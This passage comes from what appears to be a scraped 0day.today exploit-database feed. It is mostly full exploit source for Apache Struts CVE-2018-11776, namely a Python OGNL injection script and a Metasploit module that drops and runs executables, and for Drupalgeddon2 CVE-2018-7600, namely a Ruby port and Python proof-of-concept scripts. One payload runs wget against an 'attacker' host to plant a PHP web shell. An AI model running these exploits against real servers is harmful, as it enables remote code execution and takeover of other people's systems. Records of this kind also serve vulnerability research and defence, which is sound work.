resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n 
return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n 
print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.34, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.34, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 
2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of the allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. 
Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the following bad characters:\r\n # ';' seems to terminate the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or OGNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. 
:-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave the forward slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n 
print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and none include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. 
Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. 
In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\r\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 
'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": 
"2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalgeddon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print 
('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. 
BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. 
Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => 
:unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n 